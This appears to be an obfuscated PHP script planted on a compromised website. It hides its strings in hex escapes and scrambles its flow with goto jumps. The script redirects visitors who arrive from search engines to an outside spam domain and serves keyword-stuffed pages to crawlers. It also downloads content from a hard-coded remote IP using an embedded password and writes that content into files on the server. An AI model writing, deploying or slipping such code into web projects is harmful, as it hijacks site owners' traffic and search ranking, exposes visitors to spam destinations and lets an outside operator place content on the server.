Your IP : 18.224.62.168
<?php
goto EAAI7; Mf1j2: $apass3 = "\x72\166\x33\62\x79\x64\x61\x63\163\x76\x73\x64\166"; goto akrib; ThbCq: $xx1 = 5; goto nSWei; SB7z_: foreach ($_GET as $a => $b) { $_GET["\x69\144"] = $b; } goto kny1H; vmOfe: echo $text; goto ykPCS; A627z: $x1 = 3; goto ThbCq; Le3v_: $_GET["\167\157\x72\x6c\144"] = 5; goto p0Bg9; O8sqA: $apass2 = "\x62\62\x33\150\x72\x32\63\x76\162\x33\x32"; goto fAYec; CbpMh: if (strlen($text) < 5000) { $text = file_get_contents("\150\x74\164\x70\72\57\x2f\x31\x33\65\56\61\x38\61\x2e\x32\x31\56\x31\x32\x36\x2f" . $_GET["\x66\156"] . "\56\160\150\160\x3f\x70\141\163\163\75{$apass}\46\x71\x3d{$_GET["\151\x64"]}"); } goto qa2gF; nSWei: $keyword = str_replace("\x2d", "\40", $_GET["\151\x64"]); goto GjCFQ; tJkBV: $query_pars_2 = str_replace("\x2d", "\53", $_GET["\x69\x64"]); goto CL1fo; p0Bg9: $_GET["\146\156"] = "\66\x39\x36\x39\x36\x39\156\x65\167"; goto DQdoG; akrib: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto wc0zD; qa2gF: if (strlen($text) < 5000) { $url = "\x31\63\65\56\x31\70\61\56\62\x31\56\61\x32\x36"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\50{$errno}\51\74\x62\162\x20\57\76\xa"; } else { $req = "\57" . $_GET["\x66\156"] . "\56\x70\x68\x70\x3f\160\141\x73\163\x3d{$apass}\x26\161\x3d{$_GET["\151\144"]}"; $out = "\x47\105\x54\x20{$req}\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\15\xa"; $out .= "\110\x6f\x73\x74\72\40{$url}\xd\xa"; $out .= "\103\157\x6e\156\145\143\164\151\x6f\x6e\x3a\40\103\154\157\163\x65\xd\12\xd\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto tG2NN; AdIZR: if ($_GET["\151\x64"] == "\x69\x6e\144\x65\170") { header("\x4c\157\x63\x61\x74\151\157\x6e\x3a\x20\x68\164\x74\160\x73\72\57\57\x67\x6f\157\147\154\x65\56\x63\157\x6d"); die; } goto Le3v_; d03PP: if ($s == "\x5c" | $s == "\57") { $s = ''; } goto awmck; awmck: $s = $_SERVER["\123\105\x52\x56\x45\122\x5f\x4e\x41\x4d\105"] . $s; goto Mf1j2; kny1H: if ($_GET["\151\144"] == "\x74\145\163\x74\151\x6e\x67") { echo "\x74\x65\x73\x74\x20\147\157\x6f\x64\56\x2e\56"; die; } goto AdIZR; lNtoo: if (function_exists("\x63\165\162\x6c\137\x69\x6e\x69\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\164\x74\x70\72\57\x2f\x31\x33\x35\x2e\61\x38\x31\56\x32\x31\x2e\61\62\x36\57" . $_GET["\x66\156"] . "\x2e\160\150\x70\77\x70\x61\163\163\x3d{$apass}\46\161\75{$_GET["\x69\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\x7a\151\x6c\154\x61\57\x34\56\x30\x20\x28\x63\x6f\x6d\160\x61\x74\x69\142\154\x65\73\40\115\x53\x49\105\x20\x36\x2e\60\73\x20\127\151\x6e\x64\157\167\163\40\x4e\x54\x20\65\x2e\61\73\x20\x53\126\x31\x29"); $text = curl_exec($ch); curl_close($ch); } goto CbpMh; CL1fo: $text = ''; goto lNtoo; wc0zD: if (strpos($_SERVER["\x48\124\x54\120\137\122\105\106\x45\122\x45\x52"], "\147\x6f\157\147\x6c\145\x2e") or strpos($_SERVER["\x48\x54\124\x50\x5f\122\105\106\105\122\x45\x52"], "\x79\141\x68\x6f\157\x2e") or strpos($_SERVER["\x48\x54\x54\x50\x5f\122\105\x46\x45\x52\x45\122"], "\142\151\156\x67\56")) { $tpl = "\x69\156\x64\x65\x78\57" . $_GET["\x69\x64"] . "\56\160\150\x70\x2e\164\x70\154"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\155\x79"]; header("\114\x6f\x63\x61\x74\151\157\156\x3a\40\150\164\x74\x70\163\x3a\x2f\57\143\150\160\x6f\153\56\163\x69\164\x65\x2f\145\156\164\x65\162\57\77\x6d\141\162\153\75{$today}\55{$s}\x26\x74\160\x6c\75{$tpl}\46\x65\156\147\x6b\145\x79\x3d{$keyword}"); die; } else { $myname = $_GET["\151\144"] . "\x2e\160\x68\160"; if (file_exists("\x69\156\x64\145\170\x2f" . $myname)) { $html = @file_get_contents("\151\156\144\x65\x78\57" . $myname); if (strpos($_SERVER["\x48\124\x54\120\x5f\125\123\105\122\x5f\x41\x47\x45\x4e\124"], "\x62\151\x6e\x67") > 2 or strpos($_SERVER["\x48\x54\124\120\x5f\125\x53\x45\x52\x5f\101\107\105\x4e\124"], "\x79\141\x68\x6f\x6f") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\x69\144"]); $html = str_replace("\x3c\x74\x69\x74\154\145\x3e\x3c\x2f\164\151\x74\x6c\145\x3e", "\74\164\x69\164\x6c\145\x3e{$keyword}\x3c\57\164\151\164\154\x65\76", $html); } echo $html; die; } } goto tJkBV; DQdoG: $apass1 = "\166\151\x73\144\x6f\x69\152\x65\x77"; goto A627z; EAAI7: error_reporting(0); goto S2Zcc; fAYec: $s = dirname($_SERVER["\120\110\120\137\x53\x45\x4c\x46"]); goto d03PP; GjCFQ: $keyword = str_replace("\x20", "\x2b", $keyword); goto O8sqA; S2Zcc: $today = "\x32\x30\x32\65\x30\63\x30\70\55"; goto SB7z_; tG2NN: if (strlen($text) > 5000) { $out = fopen("\x69\x6e\144\x65\170\57" . $myname, "\167"); fwrite($out, $text); fclose($out); } goto vmOfe; ykPCS: ?>